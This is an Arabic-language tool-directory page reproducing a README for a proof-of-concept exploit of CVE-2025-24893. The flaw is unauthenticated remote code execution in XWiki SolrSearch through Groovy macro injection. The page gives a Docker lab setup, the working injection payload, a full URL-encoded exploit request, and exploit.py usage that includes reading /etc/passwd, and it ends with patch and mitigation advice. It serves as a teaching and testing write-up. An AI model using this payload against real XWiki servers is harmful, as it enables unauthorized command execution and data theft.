Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xwiki-cve-2025-24893 — استغلال تنفيذ الأوامر عن بُعد دون مصادقة لـ XWiki SolrSearch (CVE-2025-24893) عبر حقن Groovy في معامل النص، مع بيئة مختبرية قائمة على Docker وسكربت إثبات المفهوم (PoC). | Kitploit
أدوات/GitHubGitHub/endusdksla/xwiki-cve-2025-24893
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubendusdksla/xwiki-cve-2025-24893

xwiki-cve-2025-24893

استغلال تنفيذ الأوامر عن بُعد دون مصادقة لـ XWiki SolrSearch (CVE-2025-24893) عبر حقن Groovy في معامل النص، مع بيئة مختبرية قائمة على Docker وسكربت إثبات المفهوم (PoC).

عرض المستودع
9منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

XWiki SolrSearch RCE بدون مصادقة (CVE-2025-24893)


المساهمون

  • الدفعة الرابعة من مدرسة القبعة البيضاء، الفصل 25: إم دو-يون (@endusdksla)

الملخص

  • يقوم XWiki بتحليل صيغة الويكي والماكرو وتفسيرها على الخادم ثم عرضها. المشكلة أن صفحة Main.SolrSearch مفتوحة للزوار، وفي نفس الوقت يتم تقييم المعامل text المُدخل من المستخدم كصيغة XWiki دون تحقق كافٍ.
  • يمكن للمهاجم حقن ماكرو {{groovy}} في text لتنفيذ أي كود Groovy على الخادم، كما يمكن استدعاء أوامر نظام التشغيل عبر "command".execute(). يمكن استغلال هذه الثغرة بطلب GET واحد فقط دون الحاجة إلى تسجيل دخول أو أي رمز مميز.

إعداد البيئة

يستخدم هذا الدليل توزيعة XWiki الرسمية المستقلة مع بيئة تشغيل Java 17 لإنشاء بيئة قابلة للاستغلال.

15.10.1
العنصرالتفاصيل
CVECVE-2025-24893
المنتجXWiki Platform
الإصدار المتأثر>= 5.3-milestone-2, < 15.10.11 / >= 16.0.0-rc-1, < 16.4.1
إصدار التصحيح15.10.11, 16.4.1
نوع الثغرةEval Injection -> Unauthenticated RCE
هل يلزم المصادقة؟لا
التأثيرإمكانية تنفيذ أوامر على الخادم

شروط الثغرة

  • يجب أن يكون إصدار XWiki أقدم من الإصدار المُصَحَّح.
  • يجب أن يكون endpoint Main.SolrSearch متاحًا للزوار.
  • يجب أن يتمكن الخادم من تقييم المعامل text كصيغة XWiki.
  • يجب أن يكون ماكرو groovy قابلاً للتنفيذ.

تستخدم هذه البيئة XWiki 15.10.1 وبالتالي تحقق الشروط المذكورة أعلاه.

خطوات إعادة الإنتاج

root@kitploit:~
docker compose up -d --build

عند التشغيل الأول قد يستغرق التثبيت التلقائي بضع دقائق (حوالي 6-7 دقائق).

root@kitploit:~
docker compose ps
docker inspect -f '{{json .State.Health}}' xwiki-web

عندما تظهر "Status":"healthy" في مخرجات الأمر أعلاه، تكون البيئة قد اكتملت وأصبحت قابلة للاستغلال.

root@kitploit:~
pip install requests

ثبّت الاعتماديات قبل تشغيل exploit.py.

كود PoC

الحمولة الأساسية هي كما يلي:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("id".execute().text){{/groovy}}{{/async}}

يتم حقن هذه الحمولة في المعامل text وتقييمها في صفحة Main.SolrSearch. ونتيجةً لذلك، يُنفَّذ println("id".execute().text) على الخادم وتنعكس نتيجة تنفيذ الأمر في نص استجابة RSS.

راجع exploit.py لمعرفة سكربت التشغيل الكامل.

root@kitploit:~
python3 exploit.py

بتشغيل كود بايثون أعلاه يمكن إعادة إنتاج PoC. الأمر الافتراضي هو id.

root@kitploit:~
python3 exploit.py -c "cat /etc/passwd"

لتشغيل أمر آخر، مرر الوسيط كما هو موضح أعلاه.

أو يمكن إرسال الطلب عبر الرابط التالي (حمولة تطبع id):

root@kitploit:~
http://localhost:1337/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

نتائج التشغيل

poc_id لقطة لإرسال id في الاستجابة

poc_ls عرض ملفات الدليل الحالي

الإجراءات الوقائية

  • قم بتحديث XWiki إلى إصدار 15.10.11 أو أحدث، أو 16.4.1 أو أحدث.
  • راجع سياسة وصول الزوار لمثيلات XWiki المكشوفة خارجيًا.
  • قلّل صلاحيات تنفيذ السكربتات/الماكرو غير الضرورية إلى أدنى حد.
  • راقب الطلبات المشبوهة وسجلات الوصول إلى SolrSearch.

المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • GitHub Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
تنزيل الأداة